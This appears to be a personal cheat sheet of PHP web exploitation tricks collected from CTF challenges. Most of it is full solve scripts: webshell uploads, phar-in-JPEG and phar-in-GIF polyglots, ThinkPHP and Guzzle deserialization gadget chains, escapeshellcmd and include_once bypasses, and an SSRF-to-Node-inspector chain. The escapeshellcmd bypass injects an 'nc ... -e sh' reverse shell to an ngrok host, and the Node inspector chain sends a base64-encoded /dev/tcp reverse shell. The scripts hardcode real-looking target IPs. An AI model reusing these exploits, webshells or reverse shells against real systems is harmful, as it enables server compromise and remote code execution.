If the root is changed, it is possible to change PHP's configuration and potentially bypass open_basedir. However, there are many restrictions on using chroot: you need root privileges and you need to run your script with the PHP CLI. You can find more information about chroot here https://www.php.net/manual/en/function.chroot.php
ASIS CTF 2023 final challenge phphphphp
dl, load a malicious php library
ASIS CTF 2023 final challenge phphphphp
You can use dl to load a malicious library, but you need to use the PHP CLI or another SAPI with enable_dl=true
example payload:
from asis ctf challenge phphphphphp
from pwn import *
import time, base64, os
with open("foo.c", "wb") as f:
f.write(b"""
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
static void foo() __attribute__((constructor));
void foo(void)
{
puts("pwned\\\\n");
mkdir("chroot-dir", 0755);
chroot("chroot-dir");
// escape from chroot
for(int i = 0; i < 1000; i++) {
chdir("..");
}
chroot(".");
system("cat /flag.txt");
}
""")
os.system("gcc -o libfoo.so -shared foo.c")
libfoo = open("libfoo.so", "rb").read()
payload = b"""
<?php
$libfoo = "###DATA###";
$libfoo = base64_decode($libfoo);
chroot("/tmp");
mkdir("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831", 0777, true);
file_put_contents("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831/foo.so", $libfoo);
chmod("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831/foo.so", 0777);
chroot("/var/www/sbx");
dl("foo");
?>
""".strip()
payload = payload.replace(b"###DATA###", base64.b64encode(libfoo))
while True:
with remote("3.75.187.223", 7321, level="debug") as io:
line = io.recv()
if b"one try every" in line:
print("timeout from ip, waiting")
time.sleep(5)
continue
print(line)
print("sending payload")
io.sendline(str(len(payload)).encode())
io.send(payload)
io.interactive()
break
full phphphphphp solve script
PHP Obfuscation (Stress Release Service TETCTF 2024)
string_code = ['system','cat s*']
obfuscated_code = ""
charset = ["\\\\","'",".","?",'(',')', '^']
def escape_char(s):
to_escape = {
"'": "\\\\'",
"\\\\": "\\\\\\\\"
}
if s in to_escape:
return to_escape[s]
else:
return s
def search(s):
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
for o in charset:
for p in charset:
if ord(j) ^ ord(k) == ord(s):
return ".('%s'^'%s')" % (escape_char(j), escape_char(k))
if ord(j) ^ ord(k) ^ ord(l) == ord(s):
return ".('%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l))
if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) == ord(s):
return ".('%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m))
if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) == ord(s):
return ".('%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n))
if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) ^ ord(o) == ord(s):
return ".('%s'^'%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n), escape_char(o))
if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) ^ ord(o) ^ ord(p) == ord(s):
return ".('%s'^'%s'^'%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n), escape_char(o), escape_char(p))
return False
for code in string_code:
obfuscated = ""
for i in code:
tmp = search(i)
if not tmp:
obfuscated += ".'%s'" % i
else:
obfuscated += tmp
obfuscated_code += "(%s)" % obfuscated[1:]
print(''.join(["(\\"%s\\")" % i for i in string_code]) + '=' + obfuscated_code)
PHP xor bin without ' and "
<?php
function get_xor($str){
for ($i = 10; $i < 99; $i++) {
for ($j = 10; $j < 99; $j++) {
if ((hex2bin(strval($j)) ^ hex2bin(strval($i))) === $str) {
return [$j, $i];
}
}
}
return false;
}
function get_xor_str($str){
$result = [];
foreach (str_split($str) as $char) {
$result[] = get_xor($char);
}
return $result;
}
function get_xor_joined($str){
$result = "join(hex2bin(00),[";
$arrxor = get_xor_str($str);
foreach ($arrxor as $ab){
$a = $ab[0];
$b = $ab[1];
$result .= "hex2bin($a)^hex2bin($b),";
}
$result = rtrim($result, ',') . "])";
return $result;
}
$inputString = "ls /";
echo get_xor_joined($inputString)."\\n";
preg_match
There's a special case where we can make preg_match("/([^a-z])+/s", $input) return false.
In this case we need to add "A"*9000 to the input to make it return false
https://hackmd.io/@abdinata/Website-Challenge-0xL4ughCTF-2024#Simple-WAF
https://www.php.net/manual/en/function.include.php
It is also able to include or open a file from a zip file:
<?php
include "something.zip#script.php";
echo file_get_contents("something.zip#script.php");
?>
Note that instead of using / or \, opening a file inside a zip archive uses # to separate the zip name from the inner file's name.
Error based full path leak using long filename
WolvCTF 2024
import re
import httpx
# Base URL of the challenge instance (markdown autolink brackets removed).
URL = "https://upload-fun-okntin33tq-ul.a.run.app/"
# URL = "http://0:5500/"
class BaseAPI:
    """Synchronous HTTP client for the upload challenge."""

    def __init__(self, url=URL) -> None:
        self.c = httpx.Client(base_url=url)

    def f(self, f):
        """GET / with the query parameter ``f``."""
        return self.c.get("/", params={"f": f})

    def upload(self, f):
        """POST ``f`` as the multipart form field named "f".

        The dict literal used to list the "f" key twice; a duplicate key in a
        dict literal collapses to one entry, so a single key sends the same
        request.
        """
        return self.c.post("/", files={"f": f})
class API(BaseAPI):
...
if __name__ == "__main__":
    api = API()
    # Upload with an over-long filename; the path is read back from the response.
    res = api.upload(("a"*1000000, "x"))
    # Grab the text between "./uploads/" and the next "_".  The dot is
    # escaped once; the doubled backslash required a literal "\" in the
    # response and so could never match.
    match = re.search(r"(?<=\./uploads/).*?(?=_)", res.text)
    if match is None:
        raise SystemExit("upload path not found in the response")
    uppath = match.group(0)
    res = api.upload(("x", "<?=system('cat /flag*')?>"))
    res = api.f(uppath+"_x")
    print(res.text)
Bypass require_once / include_once
ACSC quals 2024 challenge DB Explorer
solver
import httpx
# URL = "http://localhost:9000"
URL = "http://db-exp.vuln.live/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url)
class API(BaseAPI):
...
if __name__ == "__main__":
while True:
api = API()
res = api.c.post("/index.php?normal=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/level_checker&admin=/var/lib/mysql/ibtmp1", data={"normal":"x"},headers={"Host": "admin.pepe"})
if "dimasmaulana" in res.text:
print(res.text.replace("\x00", "").encode().replace(b"\xef\xbf\xbd", b""))
"""
copas terus menerus di phpmyadmin
CREATE TEMPORARY TABLE temp (
x BLOB
);
INSERT INTO temp (x) VALUES
(CONCAT("dimasmaulana","<?=system('/flag');?>"));
"""
Using symlink multiple times can allow us to include a file multiple times even when using include_once. This happens because PHP does not check for a file if there are many symlinks.
LFI to rce if nginx exist and we can’t use protocol
0xbb - PHP LFI with Nginx Assistance (bierbaumer.net)
PHP Filter after check
ref: tamuctf 2024 challenge Remote
FILTER_SANITIZE_URL removes every character that is not allowed in a URL (a newline, for example). Because it runs after the preg_match check, we can use such characters to bypass the check
if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
$url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);
ex using newline:
import asyncio
import httpx
from pyngrok import ngrok
from flask import Flask
from threading import Thread
from bs4 import BeautifulSoup
PORT = 6666
TUNNEL = ngrok.connect(PORT, "http").public_url
print("TUNNEL:", TUNNEL)
URL = "https://remote.tamuctf.com/"
# URL = "http://localhost:8080/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url, timeout=9999)
def upload(self, url):
return self.c.post("/index.php", data={"url": url})
def uplaod_file(self, files, data):
return self.c.post("/index.php", files=files, data=data)
def home(self):
return self.c.get("/")
class API(BaseAPI):
...
def webServer(pathname):
app = Flask(__name__)
@app.get(f"/{pathname}")
def home():
return "<?php system($_GET['dimas']);?>"
return Thread(target=app.run, args=('0.0.0.0', PORT))
async def main():
api = API()
pathname = "index.php"
server = webServer(pathname)
server.start()
await asyncio.sleep(1)
# api.c.cookies.set("PHPSESSID", "")
res = api.upload(f"{TUNNEL}/index.ph\np")
phpsessid = api.c.cookies['PHPSESSID']
root = BeautifulSoup(res.text, features="html.parser")
print(f"{URL}/uploads/{phpsessid}/{root.find_all('a').pop().get_attribute_list('href')[0].split('=')[1]}")
server.join()
if __name__ == "__main__":
asyncio.run(main())
the code:
<?php
} else if(isset($_REQUEST['url'])) {
if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
$url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);
if(filter_var($url, FILTER_VALIDATE_URL)) {
$img = file_get_contents($url);
if($img !== false) {
$mime = substr($url, strrpos($url, '.') + 1);
$file = random_filename(32, 'uploads/' . $sess, $mime);
$f = fopen('uploads/' . $sess . '/' . $file, "wb");
if($f !== false) {
fwrite($f, $img);
fclose($f);
New 2 PHP Trick from b01lers CTF 2024 challenge
web/library_of_<?php
import httpx
import re
URL = "http://192.168.183.138:4444"
# URL = "https://libraryofphp-c20d084bfc71e709.instancer.b01lersc.tf/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url)
def index(self, q):
return self.c.post("/index.php", data={
"q": q,
})
def search(self, s, securify, d):
return self.c.get("/search.php", params={
"s": s,
"securify": securify,
"d": d,
})
class API(BaseAPI):
...
if __name__ == "__main__":
    api = API()
    # PHPSESSID needs a null byte so that PHP ignores the text after it;
    # since PHPSESSID is not read past the null byte, this makes the session invalid
    api.c.cookies.set("PHPSESSID", "mysecretsession%00a<?=/*")
    # set username to "" so the program uses the last 6 bytes of PHPSESSID
    api.c.cookies.set("username", "")
    # our payload
    res = api.index(
        q="*/`ls`; //aaax",
    )
    print(res.text)
    # Text of the first link in the response (renamed from `id`, which
    # shadowed the builtin).
    entry_id = re.search('(?<=">).*?(?=</a><br>)', res.text).group(0)
    res = api.c.get("/search.php?s="+entry_id)
    print(res.text)
    res = api.search(
        s=entry_id,
        # sha256 hash of the string "INF"
        securify="121b078c0b324860d916f4c10d6dc96ebc4885035ea6fbd75f78de5a3d9f8c41",
        # by supplying 1e1000 we turn the result of `$d + rand(0, getrandmax())` into
        # the string INF in PHP
        # so:
        # $d + rand(0, getrandmax()) === INF
        # hash('sha256', $d + rand(0, getrandmax())) === "121b078c0b324860d916f4c10d6dc96ebc4885035ea6fbd75f78de5a3d9f8c41"
        # bypassing this gives us access to 'include'
        d="1e1000"
    )
    print(res.text)
Bypass sha using INF obj
PHP evaluates 1e1000 + rand(0, getrandmax()) to INF. When this value is hashed it is converted to a string, so the result is the SHA-256 hash of the string "INF".
PHP will not read id of PHPSESSID after %00
In this case, the PHP session algorithm will ignore the string after %00: api.c.cookies.set("PHPSESSID", "mysecretsession%00a<?=/*").
If short_open_tag enabled
b01lers CTF 2024 challenge library_of_<?php
if short_open_tag enabled in php.ini we can do something like this
<?1 system($_GET['x']);
Bypass escapeshellcmd
midight-sun-2024/awkw4ard
If there’s something like this, we can inject a space into the escapeshellcmd, and it will not be sanitized
$iface = escapeshellcmd($_POST['interface']);
exec("iw dev | awk -v iface=".$iface." '/^phy#/ { phy = $0 } $1 == \"Interface\" { interface = $2 } interface == iface { print phy }'", $return);
<?php
/*
FROM php:8.3-fpm-alpine3.19
RUN adduser -D -H -s /sbin/nologin pleb
[...]
USER pleb
CMD ["php-fpm"]
*/
ini_set("display_errors", TRUE);
error_reporting(E_ALL);
?>
<div class="bg-inside">
</div>
</div>
<?php
if(!isset($_POST['interface'])){
highlight_file($_SERVER['SCRIPT_FILENAME']);
exit();
}
$iface = escapeshellcmd($_POST['interface']);
exec("iw dev | awk -v iface=".$iface." '/^phy#/ { phy = $0 } $1 == \"Interface\" { interface = $2 } interface == iface { print phy }'", $return);
$phy = $return[0];
exec('iw '.$phy.' info', $info);
echo "<pre>" . $info[0] . "</pre>\n";
?>
solve
import httpx
URL = "http://awkw4ard-1.play.hfsc.tf/"
# URL = "http://localhost:4444/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url, timeout=999)
def interface(self, interface):
return self.c.post("/", data={"interface": interface})
class API(BaseAPI):
...
if __name__ == "__main__":
api = API()
res = api.interface("nc${IFS}0.tcp.ngrok.io${IFS}17197${IFS}-e${IFS}sh {}BEGIN{system(iface)}#")
print(res.text)
symlink trick if there’s blocked function
param_payload = ".ini_set('display_errors', 1).symlink($_FILES['file']['tmp_name'], '/var/www/html/file.shtml').virtual('file.shtml').die()."
PHP Trick Using File Upload if File Upload is Restricted to Non PHP File Type Like PNG or JPEG
CODEGATE 2024
vulnerable code
related: business-ctf-2024/web/[Medium] Magicom at main · hackthebox/business-ctf-2024 (github.com)
$poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
if (!file_exists("$poll_skin_path/poll_result.skin.php")) die("skin error");
include_once ("$poll_skin_path/poll_result.skin.php");
$g4[path]=phar:/ dan $skin_dir=../../[path ke gambar]/gambar.jpg/poll_result.skin.phpentar dia include phar://skin/poll/../../[path ke gambar]/gambar.jpg/poll_result.skin.php
anjir gampang
import httpx
import base64
import hashlib
import os
URL = "http://13.125.178.249/"


class BaseAPI:
    """Thin httpx wrapper around the endpoints used by this exploit.

    Every method POSTs to one fixed path and returns the httpx response
    object unchanged.
    """

    def __init__(self, url=URL) -> None:
        # A single client so every request shares the same base URL.
        self.c = httpx.Client(base_url=url)

    def config(self, g4_path):
        """POST ``_SERVER[g4_path]`` to the image-upload ``_config.php``."""
        return self.c.post(
            "/cheditor5/imageUpload/_config.php",
            data={"_SERVER[g4_path]": g4_path},
        )

    def upload(self, file):
        """POST *file* as the multipart ``file`` field to ``upload.php``."""
        return self.c.post(
            "/cheditor5/imageUpload/upload.php",
            files={"file": file},
        )

    def index(self, sst):
        """POST ``sst`` (with a dummy ``_SERVER[g4_path]``) to ``/adm/index.php``."""
        return self.c.post("/adm/index.php", data={
            "sst": sst,
            "_SERVER[g4_path]": "x",
        })

    def version(self, g4_path):
        """POST to ``/adm/version.php`` with overridden ``_SERVER`` fields.

        The two cookies are named by the MD5 hex digest of ``ck_mb_id`` and
        ``ck_auto``; their values are base64-encoded.
        """
        return self.c.post("/adm/version.php", data={
            "_SERVER[g4_path]": g4_path,
            "sub_menu": "0",
            "auth[0]": "r",
            "_SERVER[SERVER_ADDR]": "a",
            "_SERVER[REMOTE_ADDR]": "a",
            "_SERVER[HTTP_USER_AGENT]": "a",
        }, cookies={
            hashlib.md5(b"ck_mb_id").hexdigest(): base64.b64encode(b"admin").decode(),
            hashlib.md5(b"ck_auto").hexdigest(): base64.b64encode(b"47bce5c74f589f4867dbd57e9ca9f808").decode()
        })

    def poll_result(self, filePath):
        """POST to ``/bbs/poll_result.php`` with *filePath* as ``skin_dir``.

        ``_SERVER[g4_path]`` is fixed to ``phar:/``.
        """
        return self.c.post("/bbs/poll_result.php", data={
            "skin_dir": filePath,
            "_SERVER[g4_path]": "phar:/",
            "po_id": 1,
        })


class API(BaseAPI):
    """Concrete client; adds nothing on top of BaseAPI."""
    ...
# PHP source of the archive generator.  It builds payload.phar whose stub is
# the byte string below followed by "<?php __HALT_COMPILER(); ?>", and which
# contains poll_result.skin.php running system("cat /f*").
payload = r"""<?php
$jpeg_header_size =
"\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xff\xfe\x00\x13".
"\x43\x72\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\xff\xdb\x00\x43\x00\x03\x02".
"\x02\x03\x02\x02\x03\x03\x03\x03\x04\x03\x03\x04\x05\x08\x05\x05\x04\x04\x05\x0a\x07\x07\x06\x08\x0c\x0a\x0c\x0c\x0b\x0a\x0b\x0b\x0d\x0e\x12\x10\x0d\x0e\x11\x0e\x0b\x0b\x10\x16\x10\x11\x13\x14\x15\x15".
"\x15\x0c\x0f\x17\x18\x16\x14\x18\x12\x14\x15\x14\xff\xdb\x00\x43\x01\x03\x04\x04\x05\x04\x05\x09\x05\x05\x09\x14\x0d\x0b\x0d\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14".
"\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\xff\xc2\x00\x11\x08\x00\x0a\x00\x0a\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01".
"\xff\xc4\x00\x15\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xc4\x00\x14\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xda\x00\x0c\x03".
"\x01\x00\x02\x10\x03\x10\x00\x00\x01\x95\x00\x07\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x05\x02\x1f\xff\xc4\x00\x14\x11".
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
"\xff\xda\x00\x08\x01\x02\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x06\x3f\x02\x1f\xff\xc4\x00\x14\x10\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x21\x1f\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00\x10\x92\x4f\xff\xc4\x00\x14\x11\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda".
"\x00\x08\x01\x02\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x10\x1f\xff\xd9";
$phar = new Phar('payload.phar');
$phar->startBuffering();
$phar->addFromString('poll_result.skin.php', '<?php system("cat /f*"); ?>');
$phar->setStub($jpeg_header_size."\n<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();"""

# Write the generator to disk; the file is closed before PHP is started.
with open("payload.php", "wb") as f:
    f.write(payload.encode())

# phar.readonly must be off for PHP to be allowed to create the archive.
os.system("php --define phar.readonly=0 payload.php")
if __name__ == "__main__":
    api = API()

    # Step 1: set the g4_path override through _config.php.
    res = api.config("../../bbs/skin/poll/")
    print(res.text)

    # Step 2: upload the archive under a .png name.  The context manager
    # closes the file handle once the bytes have been read.
    with open("payload.phar", "rb") as fh:
        res = api.upload(("payload.png", fh.read()))

    # Keep only the part of the reported path after the last "/../".
    filePath = res.json()["filePath"].split("/../")[-1]

    # Step 3: request poll_result.php with the uploaded file as skin_dir.
    res = api.poll_result("../../../" + filePath)
    print(res.text)
PHP Deserialization Trick Using Call
If a method that is called on an object does not exist (or is not accessible) in its class, PHP invokes the class's __call magic method instead.
example challenge:
8TH XCTF Finals
Solver
<?php
namespace think\route {
class ResourceRegister
{
public $resource;
public function __construct($resource)
{
$this->resource = $resource;
}
}
abstract class Rule
{
public $rest = ['key' => [1 => '<id>']];
public $name = "name";
public $rule;
public $router;
public $option;
public function __construct($rule, $router, $option)
{
$this->rule = $rule;
$this->router = $router;
$this->option = ['var' => ['nivia' => $option]];
}
}
class RuleGroup extends Rule
{
public function __construct($rule, $router, $option)
{
parent::__construct($rule, $router, $option);
}
}
class Resource extends RuleGroup
{
public function __construct($rule, $router, $option)
{
parent::__construct($rule, $router, $option);
}
}
}
namespace think {
class Route
{
}
abstract class Model
{
private $relation;
protected $append = ['Nivia' => "1.2"];
protected $visible;
public function __construct($visible, $call)
{
$this->visible = [1 => $visible];
$this->relation = ['1' => $call];
}
}
class Validate
{
protected $type;
public function __construct()
{
$this->type = ['visible' => "system"];//function
}
}
}
namespace think\model {
use think\Model;
class Pivot extends Model
{
public function __construct($visible, $call)
{
parent::__construct($visible, $call);
}
}
}
namespace Symfony\Component\VarDumper\Caster {
use Symfony\Component\VarDumper\Cloner\Stub;
class ConstStub extends Stub
{
}
}
namespace Symfony\Component\VarDumper\Cloner {
class Stub
{
public $value = "google-chrome"; //cmd
}
}
namespace {
$call = new think\Validate;
$option = new think\model\Pivot(new Symfony\Component\VarDumper\Caster\ConstStub, $call);
$router = new think\Route;
$resource = new think\route\Resource("abc.nivia", $router, $option);
$resourceRegister = new think\route\ResourceRegister($resource);
echo base64_encode(serialize($resourceRegister));
}
Without Symfony: use a built-in Error object for the to-string step instead
<?php
namespace think\route {
class ResourceRegister
{
public $resource;
public function __construct($resource)
{
$this->resource = $resource;
}
}
abstract class Rule
{
public $rest = ['key' => [1 => '<id>']];
public $name = "name";
public $rule;
public $router;
public $option;
public function __construct($rule, $router, $option)
{
$this->rule = $rule;
$this->router = $router;
$this->option = ['var' => ['nivia' => $option]];
}
}
class RuleGroup extends Rule
{
public function __construct($rule, $router, $option)
{
parent::__construct($rule, $router, $option);
}
}
class Resource extends RuleGroup
{
public function __construct($rule, $router, $option)
{
parent::__construct($rule, $router, $option);
}
}
}
namespace think {
class Route
{
}
abstract class Model
{
private $relation;
protected $append = ['Nivia' => "1.2"];
protected $visible;
public function __construct($visible, $call)
{
$this->visible = [1 => $visible];
$this->relation = ['1' => $call];
}
}
class Validate
{
protected $type;
public function __construct()
{
$this->type = ['visible' => "system"];//function
}
}
}
namespace think\model {
use think\Model;
class Pivot extends Model
{
public function __construct($visible, $call)
{
parent::__construct($visible, $call);
}
}
}
namespace {
$call = new think\Validate;
$option = new think\model\Pivot(new Error("\ngoogle-chrome\n"), $call);
$router = new think\Route;
$resource = new think\route\Resource("abc.nivia", $router, $option); //trigger to string in Pivot
$resourceRegister = new think\route\ResourceRegister($resource);
echo base64_encode(serialize($resourceRegister));
}
Kurang lebih exploitasinya disimplified menjadi seperti ini
<?php
namespace will\you\call\me {
class CallMe
{
private function pleaseCallMe($val, $key)
{
return call_user_func($val, $key);
}
public function __call($method, $args)
{
return call_user_func_array($method, $args);
}
}
}
namespace iam\noone {
class Noone
{
public function nobody($cash)
{
echo "thanks for your cash $cash";
}
}
}
namespace world\will\call\me {
use iam\noone\Noone;
class StrongestSorcerer
{
private Noone $callMe;
private $cash = 0;
public function __tostring()
{
if (isset($this->callMe)) {
if (is_string($this->callMe)) {
} else {
$this->callMe->nobody($this->cash);
}
}
return "World strongest sorcerer";
}
}
}
namespace because\iam\strong\after\all {
abstract class DomainExpansion
{
protected $domain;
protected $juliet;
}
}
namespace idwin\really\idwillwin {
use because\iam\strong\after\all\DomainExpansion;
class Stringify extends DomainExpansion
{
public $romeo;
private function IamString($s)
{
if ($this->juliet == $this->romeo){
return "$s";
}
}
public function __destruct()
{
$this->romeo = random_bytes(100);
$this->IamString($this->domain);
}
}
}
namespace {
if (isset($_GET['ops']) && isset($_REQUEST['ops'])) {
if ($_GET['ops'] != $_REQUEST['ops']) {
unserialize($_REQUEST['ops']);
}
}
highlight_file(__FILE__);
}
Date function xss
date('<\i\m\g \s\r\c=\x \o\n\e\r\r\o\r=\a\l\e\r\t(1)>');
PHP file execution through a CVE, and sending WebSocket frames using gopher
8TH XCTF Final
PHP Development Server <= 7.4.21 - Remote Source Disclosure (projectdiscovery.io)
import bitstruct
import requests
import json
base = 'http://172.22.177.166:64000'
proxy = f'{base}/proxy_v2.dev.php'
def get_id():
    """Return the ``id`` of the first entry served by 127.0.0.1:9229/json.

    The request is relayed through the script at ``proxy``.
    """
    data = {'uri': 'http://127.0.0.1:9229/json'}
    r = requests.post(proxy, data=data)
    return r.json()[0]['id']
def get_mtu():
    """Read ``/sys/class/net/lo/mtu`` through the proxy and return it as an int."""
    data = {'uri': 'file:///sys/class/net/lo/mtu'}
    r = requests.post(proxy, data=data)
    return int(r.text)
def read(uri):
    """Ask the proxy to fetch *uri* and return the response body as text."""
    data = {'uri': uri}
    r = requests.post(proxy, data=data)
    return r.text
def make_req(_req):
    """Join the request lines with CRLF, add the blank-line terminator, return bytes."""
    return ('\r\n'.join(_req) + '\r\n\r\n').encode()
def enc(data):
    """Percent-encode every byte of *data* as lowercase ``%xx`` and return a str."""
    # One join instead of repeated string concatenation.
    return ''.join(f'%{i:02x}' for i in data)
def make_gopher(ip, port, data):
    """Return a ``gopher://ip:port/_<percent-encoded data>`` URL.

    *data* must not contain a NUL byte; the assertion below rejects it.
    """
    assert b'\x00' not in data
    return f'gopher://{ip}:{port}/_{enc(data)}'
def make_websocket_text_frame(data):
    """Build one masked WebSocket text frame carrying *data*.

    The frame always uses the 16-bit extended length form, so *data* must be
    between 126 and 65535 bytes long.  Returns a ``bytearray`` made of the
    8-byte header followed by the masked payload.
    """
    import struct  # stdlib; builds the fixed header without bitstruct

    assert 126 <= len(data) < 2 ** 16

    FIN, RSV, OPCODE, MASK, PAYLOAD_LEN = 1, 0, 1, 1, 126
    MASK_KEY = b'\xfe\xfe\xfe\xfe'

    # Header layout, most significant bit first:
    #   byte 0   : FIN(1) RSV(3) OPCODE(4)
    #   byte 1   : MASK(1) PAYLOAD_LEN(7), 126 = "16-bit length follows"
    #   bytes 2-3: payload length, big-endian
    #   bytes 4-7: masking key
    header = struct.pack(
        '>BBH4s',
        (FIN << 7) | (RSV << 4) | OPCODE,
        (MASK << 7) | PAYLOAD_LEN,
        len(data),
        MASK_KEY,
    )

    # Each payload byte is XOR-ed with the key byte at the same index mod 4.
    masked = bytes(b ^ MASK_KEY[i % 4] for i, b in enumerate(data))
    return bytearray(header + masked)
# Driver: look up the target id and the loopback MTU through the proxy,
# build an HTTP upgrade request plus one WebSocket text frame, and deliver
# both in a single gopher:// URL.
_id = get_id()
mtu = get_mtu()
# HTTP request for /<id> on 127.0.0.1:9229 asking for a WebSocket upgrade.
req = make_req([
f'GET /{_id} HTTP/1.1',
'Sec-WebSocket-Version: 13',
'Sec-WebSocket-Key: NMtM5Mt1C7TYIF3JMw9G8w==',
'Connection: Upgrade',
'Upgrade: websocket',
'Content-Length: 0',
'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits',
'Host: 127.0.0.1:9229'
])
# NOTE(review): empty_text_frame is not referenced again in this script.
empty_text_frame = bytes.fromhex('818081808180')
padding_len = 0x50
# Shell command: base64-decode the blob and pipe the result to bash.
cmd = 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMDEuMjAwLjIwMi4yMTYvNjUwMDEgMD4mMQ== | base64 -d | bash'
# JavaScript expression; the trailing // comment carries padding_len "A"s.
express = f'require("child_process").execSync("{cmd}");//{"A" * padding_len}'
# JSON message asking for Runtime.evaluate of the expression above.
exp = {
"id": 1,
"method": "Runtime.evaluate",
"params": {
"expression": express,
"includeCommandLineAPI": True
}
}
exp_text_frame = make_websocket_text_frame(json.dumps(exp).encode())
# The request is padded with "A" bytes up to mtu bytes before the frame is
# appended -- presumably so the frame starts in a separate packet; confirm.
payload = req + b'A' * (mtu - len(req)) + exp_text_frame
print(read(make_gopher('127.0.0.1', 9229, payload)))
A misconfiguration like this can lead to arbitrary PHP file inclusion
tested in
FROM php:7.4-apache
RUN a2enmod rewrite
COPY ./src/default.conf /etc/apache2/sites-available/000-default.conf
COPY ./src/ /var/www/html/
<VirtualHost *:80>
<Directory />
Require all granted
</Directory>
ServerAdmin webmaster@localhost
LogLevel alert rewrite:trace3
DocumentRoot /var/www/html/
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
RewriteEngine On
RewriteRule ^/(.*)/$ /$1.html
</VirtualHost>
poc
http://localhost/usr/local/lib/php/peclcmd.php%3f/
reference from SCTF 2024 By W&M - W&M Team (wm-team.cn) chall havefun
Deserialization + File upload if FileCookieJar exist
https://blog.wm-team.cn/index.php/archives/82/#Simpleshop
require __DIR__ . '/vendor/autoload.php';use GuzzleHttp\Cookie\FileCookieJar;use GuzzleHttp\Cookie\SetCookie;$obj = new FileCookieJar('public/shell.php');$payload = '<?php eval(filter_input(INPUT_POST,a)); ?>';$obj->setCookie(new SetCookie([ 'Name' => 'foo',"Value"=>"1", 'Domain' => $payload, "a"=> 'bar', 'Expires' => time()]));$phar = new \Phar("1.phar");$phar->startBuffering();$phar->setStub('GIF89a'."__HALT_COMPILER();");$phar->setMetadata($obj);$phar->addFromString("test.txt", "test");$phar->stopBuffering();?>
XSS in 302 redirect
Forcing Firefox to Execute XSS Payloads during 302 Redirects | Gremwell
Some Faker __call chain
my writeup Exploitation
other
PHP POP Chain
o-o.ee/Patchstack-Alliance-CTF-S01E01/#h.otluyykmfb7g
